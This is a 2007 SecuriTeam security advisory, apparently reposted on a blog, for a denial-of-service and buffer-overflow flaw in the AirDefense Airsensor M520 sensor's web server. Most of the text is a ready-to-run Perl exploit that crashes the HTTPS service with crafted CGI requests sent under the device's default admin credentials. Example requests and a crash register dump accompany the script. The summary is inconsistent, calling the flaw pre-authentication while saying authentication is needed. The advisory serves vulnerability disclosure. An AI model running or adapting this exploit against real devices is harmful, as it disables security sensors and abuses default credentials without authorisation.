Monday, October 01, 2007

[EXPL] Airsensor M520 HTTPD Preauth DoS and Buffer Overflow (Exploit)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html


- - - - - - - - -

Airsensor M520 HTTPD Preauth DoS and Buffer Overflow (Exploit)
------------------------------------------------------------------------


SUMMARY

A vulnerability in Airsensor M520 is caused due to an unspecified error in
the CGIs files filter used for configure proprieties. This can be
exploited by sending a specially crafted HTTPS request (necessary
authentication), which will cause the HTTPS service on the system to
crash.

DETAILS

Exploit:
#!/usr/bin/perl -w
#
# Airsensor M520 HTTPD Remote Preauth Denial Of Service and Buffer
Overflow PoC
#
# The vulnerability is caused due to an unspecified error in the cgis
# files filter used for configure propierties. This can be exploited by
# sending a specially crafted HTTPS request (necessary authentication),
# which will cause the HTTPS service on the system to crash.
#
# Requisites: "Use DHCP" option interface mark "No"
#
# Examples:
#
# GET https://192.168.100.100/adLog.cgi?%41%41%41 HTTP/1.1
# GET https://192.168.100.100/post.cgi?%41%41%41 HTTP/1.1
# GET https://192.168.100.100/ad.cgi?%41%41%41 HTTP/1.1
#
# Pinging:
#
# Before:
#
# Reply from 192.168.100.100: bytes=32 time<1ms TTL=64
# Reply from 192.168.100.100: bytes=32 time<1ms TTL=64
# Reply from 192.168.100.100: bytes=32 time<1ms TTL=64
#
# After:
#
# Hardware error.
# Hardware error.
# Hardware error.
# Request timed out.
# Request timed out.
# Request timed out.
#
# C:\>nc -vvn 192.168.100.100 443
# (UNKNOWN) [192.168.100.100] 443 (?): connection refused
# sent 0, rcvd 0: NOTSOCK
#
# Buffer Overflow debug log:
#
# 1970-01-01 00:00:15 SYS-INFO:: AirDefense Firmware Version 4.4.1.4,
Model = M520
# 1970-01-01 00:00:15 SYS-CRIT:: SENSOR EXCEPTION ERROR
# 1970-01-01 00:00:15 SYS-CRIT:: SENSOR VERSION NUMBER: 4.4.1.4
# 1970-01-01 00:00:15 SYS-CRIT:: SENSOR Up Time: 00:08:51
# 1970-01-01 00:00:15 SYS-CRIT:: Time of Exception: 1970-01-01 00:08:55
# 1970-01-01 00:00:15 SYS-CRIT:: Exception ID = 10 ( Reserved
Instruction)
# 1970-01-01 00:00:15 SYS-CRIT:: Thread = HTTPD
# 1970-01-01 00:00:15 SYS-CRIT:: MIPS Register Dump:
# 1970-01-01 00:00:15 SYS-CRIT:: zero=0x00000000 at=0xfffffffe
v0=0x00000000 v1=0x00000000
# 1970-01-01 00:00:16 SYS-CRIT:: a0=0x00000000 a1=0x3d000000
a2=0x00000010 a3=0x00000041
# 1970-01-01 00:00:16 SYS-CRIT:: t0=0x00000000 t1=0x0000003d
t2=0x0000000b t3=0x00000000
# 1970-01-01 00:00:16 SYS-CRIT:: t4=0x802f799c t5=0xf43dd40f
t6=0x0066a1a4 t7=0x4df0e494
# 1970-01-01 00:00:16 SYS-CRIT:: s0=0x802f7dbf s1=0x0000001f
s2=0x802f7910 s3=0x80120000
# 1970-01-01 00:00:16 SYS-CRIT:: s4=0x80120000 s5=0x80986c30
s6=0x80120000 s7=0x80128afc
# 1970-01-01 00:00:16 SYS-CRIT:: t8=0x480ec8cd t9=0x742b7136
k0=0x802f78c8 k1=0x802f7910
# 1970-01-01 00:00:16 SYS-CRIT:: gp=0x8015b070 sp=0x802f7910
fp=0x80128aec ra=0x800b2534
# 1970-01-01 00:00:16 SYS-CRIT:: Address of instruction that caused
exception = 0x800b2534
# 1970-01-01 00:00:16 SYS-CRIT:: Memory address at which adress
exception occured = 0x00000000
# 1970-01-01 00:00:16 SYS-CRIT:: Return address = 0x800b2534
# 1970-01-01 00:00:17 SYS-CRIT:: Status Reg = 0x1000af03
# 1970-01-01 00:00:17 SYS-CRIT:: Cache Reg = 0x00000000
# 1970-01-01 00:00:17 SYS-CRIT:: Cause Reg = 0x30000028
# 1970-01-01 00:00:17 SYS-CRIT:: Config Reg = 0x03fffbfb
# 1970-01-01 00:00:17 SYS-CRIT:: Vector = 40
# 1970-01-01 00:00:17 SYS-CRIT:: Processor Version = 0x00018009
# 1970-01-01 00:00:17 SYS-CRIT:: Stack Trace Begin: "->" = return
address
# 1970-01-01 00:00:17 SYS-CRIT:: [802f7910]=0x802f7dbf
# 1970-01-01 00:00:17 SYS-CRIT:: [802f7914]=0x00000000
# 1970-01-01 00:00:17 SYS-CRIT:: [802f7918]=0x00000000
# 1970-01-01 00:00:19 SYS-CRIT:: [802f7990]=0x80130000
# 1970-01-01 00:00:19 SYS-CRIT:: [802f7994]=0x802f7db4
# 1970-01-01 00:00:19 SYS-CRIT:: [802f7998]=0x80152e18
# 1970-01-01 00:00:19 SYS-CRIT:: [802f799c]=0x80152ed8
# 1970-01-01 00:00:19 SYS-CRIT:: [802f79a0]=0x802f7dbf
# 1970-01-01 00:00:19 SYS-CRIT:: [802f79a4]=0x80986c30
# 1970-01-01 00:00:19 SYS-CRIT:: [802f79a8]=0x802f8200
# 1970-01-01 00:00:19 SYS-CRIT:: ->[802f79ac]=0x800f0450 <- return
address
# 1970-01-01 00:00:19 SYS-CRIT:: [802f79b0]=0x0d0a0074
# 1970-01-01 00:00:21 SYS-CRIT:: Stack Trace End:
#
# The vulnerability has been reported in versions Airdefense
#
# Firmware Version 4.3.1.1, Model = M520
# Firmware version 4.4.1.4, Model = M520
#
# More information:

http://www.airdefense.net
#

http://support.airdefense.net
#
# Very special credits: str0ke, Kf, rathaous, !dsr, 0dd.
#
# and friends: nitr0us, crypkey, dex, xdawn, sirdarckcat, kuza55,
# pikah, codebreak, h3llfyr3
#
# Alex Hernandez ahernandez [at] sybsecurity dot com
#

use strict;
use LWP;
use Data::Dumper;
require HTTP::Request;
require HTTP::Headers;

my $string = "%41%41%41"; # Strings to send
my $method = 'GET'; # Method "GET" or "POST"
my $uri = 'https://192.168.100.100'; # Factory default IP address
my $content = "/adLog.cgi?"; # Cgi's file to crash

#my $content = "/ad.cgi?";
#my $content = "/post.cgi?";
#my $content = "/logout.cgi?";

my $headers = HTTP::Headers->new(

'Host:' => '192.168.100.100',
'User-Agent:' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1;
en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6',
'Accept:' =>
'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5',
'Accept-Language:' => 'en-us,en;q=0.5',
'Accept-Charset:' => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
'Keep-Alive:' => '300',
'Connection:' => 'keep-alive',
'Referer:' =>
'https://192.168.100.100/adLog.cgi?submitButton=refresh&refresh=Refresh',
'Authorization:' => 'Basic YWRtaW46YWlyc2Vuc29y', # base64 encode
admin:airsensor

);

my $request = HTTP::Request->new($method, $uri, $headers, $content,
$string);

my $ua = LWP::UserAgent->new;
my $response = $ua->request($request);

print "[+] Denial of Service exploit for Airsensor M520 Final\n";
print "[+] Coded by: Alex Hernandez [ahernandez\@sybsecurity.com]\n";
print "[+] We got this response from sensor: \n\n" . $response->content .
"\n";

my $data;
foreach my $pair (split('&', $response->content)) {
my ($k, $v) = split('=', $pair);
$data->{$k} = $v;
}

if ($data->{RESULT} != 0) {

print "[+] Denial of Service exploit for Airsensor M520 Final\n";
print "[+] Coded by: Alex Hernandez[ahernandez\@sybsecurity.com]\n";
print "[+] Use:\n";
print "\tperl -x dos_sensor.pl\n";
print $data->{RESPMSG} . "\n";
exit(0);

} else {

print "[+] Denial of service Exploit successed!!!\n";
print "[+] By Alex Hernandez[ahernandez\@sybsecurity.com]\n";
}

# milw0rm.com [2007-09-18]


ADDITIONAL INFORMATION

The information has been provided by <mailto:ahernandez@sybsecurity.com>
Alex Hernandez.

========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

No comments:

Post a Comment